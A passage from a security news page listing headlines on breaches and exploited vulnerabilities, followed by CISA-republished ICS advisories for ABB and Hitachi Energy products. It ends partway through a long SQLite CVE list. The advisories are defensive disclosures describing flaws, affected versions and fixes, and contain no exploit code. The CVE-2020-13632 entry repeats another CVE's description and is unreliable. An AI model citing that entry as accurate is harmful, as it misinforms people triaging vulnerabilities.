[Virtual Event] Anatomy of a Data Breach: What to Do if it Happens to You
Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign

A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows. [...]

Euro and USD stablecoins depeg amid ongoing $2.8M StablR exploit

The suspected cause is a private key compromise of one owner in the minting multisig account, said Blockaid.

70% of all crypto wrench attacks happen in France: Report

Centralized data collection is a honeypot for hackers and organized criminals looking to target crypto holders and their families, according to Bitcoiners.

Laravel Lang packages hijacked to deploy credential-stealing malware

A supply chain attack targeting the Laravel Lang localization packages has exposed developers to a sophisticated credential-stealing malware campaign after attackers abused GitHub version tags to distribute malicious code through Composer packages. [...]

These special phone and app features can help protect you from spyware

Apple, Meta, and Google offer special security modes that make your devices more resistant to targeted spyware attacks. Here is how those modes work, what they do, and how to switch them on.

Netherlands seizes 800 servers of hosting firm enabling cyberattacks

Financial crime investigators in the Netherlands (FIOD) arrested two men and seized 800 servers linked to a web hosting company that enabled cyberattacks, interference operations, and disinformation campaigns. [...]

Lawmakers Demand Answers as CISA Tries to Contain Data Leak

Lawmakers in both houses of Congress are demanding answers from the U.S. Cybersecurity & Infrastructure Security Agency (CISA) after KrebsOnSecurity reported this week that a CISA contractor intentionally published AWS GovCloud keys and a vast trove of other agency secrets on a public GitHub account. The inquiry comes as CISA is still struggling to contain the breach and invalidate the leaked credentials.

Kash Patel’s clothing brand website shut down after reports it was hacked

According to users on X, the website was hijacked by hackers in an attempt to trick visitors into installing malware.

Bitcoin miner MARA spent $4.3M on CEO security in 2025 as crypto attacks rise

MARA spent $4.3 million on CEO Fred Thiel’s security in 2025, including vehicle armoring, as crypto wrench attacks increased globally.

DeFi hacks shake institutional confidence as risks outpace yields

Repeated bridge exploits and shrinking yields are making institutions question whether DeFi’s risks still justify the returns, says Symbiotic’s Putiatin.

THORChain exploit tied to malicious node and GG20 flaw

The $10.7 million THORChain exploit was caused by a GG20 vulnerability, which allowed a malicious node to reconstruct a full private key to one of its vaults.

Trend Micro warns of Apex One zero-day exploited in the wild

Japanese cybersecurity software company Trend Micro has addressed an Apex One zero-day vulnerability exploited in attacks targeting Windows systems. [...]

Verizon DBIR: Healthcare Fends Off Increased Social Engineering Attacks

Ransomware and vendor breaches persist. The "2026 Data Breach Investigations Report" (DBIR) highlights how evolving social engineering tactics make the sector more vulnerable.

Drupal: Critical SQL injection flaw now targeted in attacks

Drupal is warning that hackers are attempting to exploit a "highly critical" SQL injection vulnerability announced earlier this week. [...]

Detecting CVE-2026-0265 at Scale: PAN-OS CAS Authentication Bypass

CVE-2026-0265 lets unauthenticated attackers forge a JWT and log in as any trusted user on CAS-enabled PAN-OS deployments. Bishop Fox built a detection tool that returns a definitive verdict from a single anonymous request, and breaks down exactly how the bug works and what to do about it.

Ubiquiti patches three max severity UniFi OS vulnerabilities

Ubiquiti has released security updates to patch three maximum severity vulnerabilities in UniFi OS that can be exploited by remote attackers without privileges. [...]

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation:

CVE-2026-9082 Drupal Core SQL Injection Vulnerability

This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Polymarket team says user funds safe as exploit losses climb above $600K

Polymarket said user funds and market resolution were safe after a suspected private key compromise tied to top-up operations.

Verus bridge exploiter returns $8.5M after bounty offer

The hacker behind the Verus bridge exploit returned 75% of the stolen funds as part of a recovery deal negotiated with the protocol days after the incident.

China's Webworm Uses Discord, Microsoft Graphs to Hack EU Governments

The advanced persistent threat group also relied on SOCKS proxies like SoftEther VPN, tunneling tools that act as a middleman between victim and attacker.

CVE-2026-27886: Unauthenticated Boolean-Oracle Exfiltration of Administrator Secrets in Strapi

A sanitization bypass in Strapi 4.0.0 through 5.36.1 lets unauthenticated attackers extract an admin's password reset token character by character and take over the account. With over 20,000 internet-facing hosts exposed, Bishop Fox breaks down how the exploit works and how to remediate it.

Tokenized stocks risk liquidity and revenue fragmentation: Research

TradFi views the breakup of its previously consolidated, centralized liquidity as a “serious structural threat,” said Tiger Research director Ryan Yoon.

Accused attackers of Sandbox exec’s wife tried to flee via Uber

CertiK reported earlier this month that criminal wrench attack teams usually consist of three to five people and are often made up of amateurs, while the masterminds are outside the country.

Alleged Kimwolf Botmaster ‘Dort’ Arrested, Charged in U.S. and Canada

Canadian authorities on Wednesday arrested a 23-year-old Ottawa man on suspicion of building and operating Kimwolf, a fast spreading Internet-of-Things botnet that enslaved millions of devices for use in a series of massive distributed denial-of-service (DDoS) attacks over the past six months. KrebsOnSecurity publicly named the suspect in February 2026 after the accused launched a volley of DDoS, doxing and swatting campaigns against this author and a security researcher. He now faces criminal hacking charges in both Canada and the United States.

Law enforcement shuts down VPN service used by two dozen ransomware gangs

First VPN promised hackers complete anonymity for their cyberattacks. But Europol said it was able to notify the service’s users that they have now been identified.

Inside a Crypto Drainer: How to Spot it Before it Empties Your Wallet

Modern crypto drainers don't hack wallets. They trick users into approving malicious transactions. Flare explores how the Lucifer DaaS platform scales wallet theft through phishing and automation. [...]

Chinese APTs Share Linux Backdoor in Central Asia Telco Attacks

"Showboat" doesn't show off, but clearly it doesn't need to, as it's long helped China spy on small market communications providers.

Chinese hackers target telcos with new Linux, Windows malware

A Chinese cyber-espionage campaign has been targeting telecommunications providers with newly discovered Linux and Windows malware dubbed Showboat and JFMBackdoor, respectively. [...]

Max severity Cisco Secure Workload flaw gives Site Admin privileges

Cisco has released security updates to address a maximum-severity vulnerability in Secure Workload that allows attackers to gain Site Admin privileges. [...]

Flipper unveils a Linux-powered networking gadget built for hackers and tinkerers

Flipper Devices said that the new gadget is in development and the base model will cost under $350.

Police seize “First VPN” service used in ransomware, data theft attacks

A virtual private network service called 'First VPN,' used in ransomware and data theft attacks, has been taken offline in a joint international law enforcement operation. [...]

Content Delivery Exploit Opens Websites to Brand Hijacking

The Underminr domain-fronting attack allows threat actors to modify Web requests and leverage trusted websites to cloak malicious activity.

CISA Adds Two Known Exploited Vulnerabilities to Catalog

CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation:

CVE-2025-34291 Langflow Origin Validation Error Vulnerability
CVE-2026-34926 Trend Micro Apex One (On-Premise) Directory Traversal Vulnerability

These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

ABB Terra AC Wallbox

Summary

ABB is aware of vulnerabilities in the product versions listed as affected in the advisory. An attacker who successfully exploited these vulnerabilities could corrupt heap memory, which could potentially allow remote control of the product and a write operation to the flash memory that alters the firmware behavior.

The following versions of ABB Terra AC Wallbox are affected:
Terra AC wallbox (JP) <=1.8.33, 1.8.36 (CVE-2025-10504, CVE-2025-12142, CVE-2025-12143)

CVSS v3: 6.1
Vendor: ABB
Equipment: ABB Terra AC Wallbox
Vulnerabilities: Heap-based Buffer Overflow, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'), Stack-based Buffer Overflow

Background

Critical Infrastructure Sectors: Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

CVE-2025-10504
There is a potential risk of corrupting memory when developing apps that communicate with the charger according to a self-defined protocol, if developers do not strictly follow the field length, which is not validated in the firmware.
Relevant CWE: CWE-122 Heap-based Buffer Overflow
CVSS 3.1 base score: 6.1 (MEDIUM)
Vector string: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H/E:P/RL:O/RC:C

CVE-2025-12142
There is a potential risk of corrupting BSS memory when developing apps that communicate with the charger via Bluetooth according to a self-defined protocol, if developers configure an unexpected length of bin files.
Relevant CWE: CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
CVSS 3.1 base score: 6.1 (MEDIUM)
Vector string: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H/E:P/RL:O/RC:C

CVE-2025-12143
There is a potential risk of corrupting stack memory when developing a customized OCPP key "RandomDelay" in the backend and configuring an unexpected number in the field.
Relevant CWE: CWE-121 Stack-based Buffer Overflow
CVSS 3.1 base score: 6.1 (MEDIUM)
Vector string: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H/E:P/RL:O/RC:C

Affected Products (same for all three CVEs)

Vendor: ABB
Product Version: ABB Terra AC wallbox (JP) <=1.8.33
Product Status: fixed, known_affected

Remediations (same for all three CVEs)

Vendor fix: The problem is corrected in the following product version; apply the following update depending on product variant: Terra AC wallbox (JP) 1.8.36. ABB recommends that customers apply the update at their earliest convenience.

Mitigation (same for all three CVEs)

To attack with this kind of message, hackers must first hijack the Bluetooth connection before they can send messages, because the communication messages between BLE and the charger are encrypted. In theory, there is no way to attack the charger.

Acknowledgments

ABB PSIRT reported these vulnerabilities to CISA.

Notice

The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability.

Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
Locate control system networks and remote devices behind firewalls and isolate them from business networks.
When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer

This ICSA is a verbatim republication of ABB PSIRT 9AKK108471A8107 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory.

Revision History

Initial Release Date: 2025-09-16

Date        Revision  Summary
2025-09-16  1         Initial version.
2025-09-28  2         DocumentID update
2025-09-28  3         Minor corrections
2025-10-09  4         CVSS update
2025-10-27  5         CVE update
2025-11-28  6         CVE update
2025-11-28  7         Fixed Version update
2026-05-21  8         Initial CISA Republication of ABB PSIRT 9AKK108471A8107 advisory

Hitachi Energy GMS600

Summary

Hitachi Energy is aware of the vulnerability CVE-2022-4304 in the OSS component OpenSSL, which affects the GMS600 versions listed below. An attacker successfully exploiting this vulnerability could send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection. For immediate mitigation/workaround information, please refer to the General Mitigation Factors/Workarounds.

The following versions of Hitachi Energy GMS600 are affected:
GMS600 1.3.0 through 1.3.1 (CVE-2022-4304)

CVSS v3: 5.9
Vendor: Hitachi Energy
Equipment: Hitachi Energy GMS600
Vulnerabilities: Observable Discrepancy

Background

Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

CVE-2022-4304
A timing-based side channel exists in the OpenSSL RSA decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher-style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OAEP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.

Affected Products
Vendor: Hitachi Energy
Product Version: GMS600 versions 1.3.0 and 1.3.1
Product Status: known_affected

Remediations
Vendor fix: Upgrade to version 1.3.2

Relevant CWE: CWE-203 Observable Discrepancy
CVSS 3.1 base score: 5.9 (MEDIUM)
Vector string: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Acknowledgments

Hitachi Energy Internal Team reported this vulnerability to CISA.

Notice

The information in this document is subject to change without notice and should not be construed as a commitment by Hitachi Energy. Hitachi Energy provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall Hitachi Energy or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if Hitachi Energy or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from Hitachi Energy and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Support

For additional information and support please contact your product provider or Hitachi Energy service organization. For contact information, see https://www.hitachienergy.com/contact-us/ for Hitachi Energy contact centers.

General Mitigation Factors

Recommended security practices and firewall configurations, such as enforcing ingress IP allowlisting and applying traffic rate limiting in accordance with the operational security policy, can help protect a process control network from attacks that originate from outside the network. Such practices include that process control systems are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that have to be evaluated case by case. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.

SSVC: SSVCv2/E:N/A:Y/2026-04-22T13:37:14Z/

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities.

Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
Locate control system networks and remote devices behind firewalls and isolate them from business networks.
When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer

This ICSA is a verbatim republication of Hitachi Energy PSIRT 8DBD000159 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Hitachi Energy PSIRT directly for any questions regarding this advisory.

Revision History

Initial Release Date: 2023-06-27

Date        Revision  Summary
2023-06-27  1         Initial public release.
2026-04-28  2         Updated fixed version.
2026-05-21  3         Initial CISA Republication of Hitachi Energy PSIRT 8DBD000159 advisory

ABB B&R Automation Studio

Summary

ABB became aware of vulnerabilities in the product versions listed as affected in the advisory. An update is available that replaces an outdated third-party component. Although no successful exploitation was observed during testing of the affected B&R products, the identified vulnerabilities could present potential attack vectors that might enable unauthorized access, data exposure, or remote code execution.

The following versions of ABB B&R Automation Studio are affected:
B&R Automation Studio <6.5, 6.5 (CVE-2025-6965, CVE-2025-3277, CVE-2023-7104, CVE-2022-35737, CVE-2020-15358, CVE-2020-13632, CVE-2020-13631, CVE-2020-13630, CVE-2020-13435, CVE-2020-13434, CVE-2020-11656, CVE-2020-11655, CVE-2019-19646, CVE-2019-19645, CVE-2019-8457, CVE-2018-20506, CVE-2018-20505, CVE-2018-20346, CVE-2018-8740, CVE-2017-10989, CVE-2016-6153, CVE-2015-6607, CVE-2015-5895, CVE-2015-3717, CVE-2015-3416)

CVSS v3: 9.8
Vendor: ABB
Equipment: ABB B&R Automation Studio
Vulnerabilities: Numeric Truncation Error, Heap-based Buffer Overflow, Improper Restriction of Operations within the Bounds of a Memory Buffer, Out-of-bounds Write, NULL Pointer Dereference, Incorrect User Management, Use After Free, Integer Overflow or Wraparound, Improper Check for Unusual or Exceptional Conditions, Uncontrolled Recursion, Out-of-bounds Read, Improper Input Validation, Exposure of Sensitive Information to an Unauthorized Actor, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Background

Critical Infrastructure Sectors: Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Affected Products, Remediations and Mitigation (same for every CVE listed below)

Vendor: ABB
Product Version: ABB B&R Automation Studio <6.5
Product Status: fixed, known_affected
Vendor fix: The problem is corrected in the following product version: B&R Automation Studio 6.5. B&R recommends that customers apply the update at their earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.
Mitigation: Refer to section "General security recommendations" for advice on how to keep your system secure.

Vulnerabilities

CVE-2025-6965
There exists a vulnerability in SQLite versions before 3.50.2 where the number of aggregate terms could exceed the number of columns available. This could lead to a memory corruption issue.
Relevant CWE: CWE-197 Numeric Truncation Error
CVSS 3.1 base score: 9.8 (CRITICAL)
Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C

CVE-2025-3277
An integer overflow vulnerability exists in SQLite's concat_ws() function that can lead to a massive heap buffer overflow. When triggered, the integer overflow results in a truncated size value being used for buffer allocation, while the original untruncated size is used for writing the resulting string, causing a heap buffer overflow of approximately 4GB.
Relevant CWE: CWE-122 Heap-based Buffer Overflow
CVSS 3.1 base score: 9.8 (CRITICAL)
Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C

CVE-2023-7104
A vulnerability was found in SQLite SQLite3 up to 3.43.0 and classified as critical. This issue affects the function sessionReadRecord of the file ext/session/sqlite3session.c of the component make alltest Handler. The manipulation leads to heap-based buffer overflow.
Relevant CWE: CWE-122 Heap-based Buffer Overflow
CVSS 3.1 base score: 7.3 (HIGH)
Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C

CVE-2022-35737
SQLite 1.0.12 through 3.39.x before 3.39.2 sometimes allows an array-bounds overflow if billions of bytes are used in a string argument to a C API.
Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
CVSS 3.1 base score: 7.5 (HIGH)
Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C

CVE-2020-15358
In SQLite before 3.32.3, select.c mishandles query-flattener optimization, leading to a multiSelectOrderBy heap overflow because of misuse of transitive properties for constant propagation.
Relevant CWE: CWE-787 Out-of-bounds Write
CVSS 3.1 base score: 5.5 (MEDIUM)
Vector string: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C

CVE-2020-13632
There exists a vulnerability in SQLite versions before 3.50.2 where the number of aggregate terms could exceed the number of columns available. This could lead to a memory corruption issue.
Relevant CWE: CWE-476 NULL Pointer Dereference
CVSS 3.0 base score: 5.5 (MEDIUM)
Vector string: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C

CVE-2020-13631
SQLite before 3.32.0 allows a virtual table to be renamed to the name of one of its shadow tables, related to alter.c and build.c.
Relevant CWE: CWE-286 Incorrect User Management
CVSS 3.1 base score: 5.5 (MEDIUM)
Vector string: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N/E:P/RL:O/RC:C

CVE-2020-13630
ext/fts3/fts3.c in SQLite before 3.32.0 has a use-after-free in fts3EvalNextRow, related to the snippet feature.
Relevant CWE: CWE-416 Use After Free
CVSS 3.0 base score: 7 (HIGH)
Vector string: CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C

CVE-2020-13435
SQLite through 3.32.0 has a segmentation fault in sqlite3ExprCodeTarget in expr.c.
Relevant CWE: CWE-476 NULL Pointer Dereference
CVSS 3.1 base score: 7.5 (HIGH)
Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C

CVE-2020-13434
SQLite through 3.32.0 has an integer overflow in sqlite3_str_vappendf in printf.c.
Relevant CWE: CWE-190 Integer Overflow or Wraparound Metrics CVSS Version Base Score Base Severity Vector String 3.0 5.5 MEDIUM CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2020-11656 In SQLite through 3.31.1, the ALTER TABLE implementation has a use-after-free, as demonstrated by an ORDER BY clause that belongs to a compound SELECT statement. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2020-11655 SQLite through 3.31.1 allows attackers to cause a denial of service (segmentation fault) via a malformed window-function query because the AggInfo object's initialization is mishandled. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. 
Relevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2019-19646 pragma.c in SQLite through 3.30.1 mishandles NOT NULL in an integrity_check PRAGMA command in certain cases of generated columns. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2019-19645 alter.c in SQLite through 3.30.1 allows attackers to trigger infinite recursion via certain types of self-referential views in conjunction with ALTER TABLE statements. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. 
Relevant CWE: CWE-674 Uncontrolled Recursion Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2019-8457 SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2018-20506 SQLite before 3.25.3, when the FTS3 extension is enabled, encounters an integer overflow (and resultant buffer overflow) for FTS3 queries in a "merge" operation that occurs after crafted changes to FTS3 shadow tables, allow-ing remote attackers to execute arbitrary code by leveraging the ability to run arbitrary SQL statements (such as in certain WebSQL use cases). This is a different vulnerability than CVE-2018-20346. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. 
The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-190 Integer Overflow or Wraparound Metrics CVSS Version Base Score Base Severity Vector String 3.0 8.1 HIGH CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2018-20505 SQLite 3.25.2, when queries are run on a table with a malformed PRIMARY KEY, allows remote attackers to cause a denial of service (application crash) by leveraging the ability to run arbitrary SQL statements (such as in certain WebSQL use cases). View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.0 7.5 HIGH CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2018-20346 SQLite before 3.25.3, when the FTS3 extension is enabled, encounters an integer overflow (and resultant buffer overflow) for FTS3 queries that occur after crafted changes to FTS3 shadow tables, allowing remote attackers to execute arbitrary code by leveraging the ability to run arbitrary SQL statements (such as in certain WebSQL use cases), aka Magellan. 
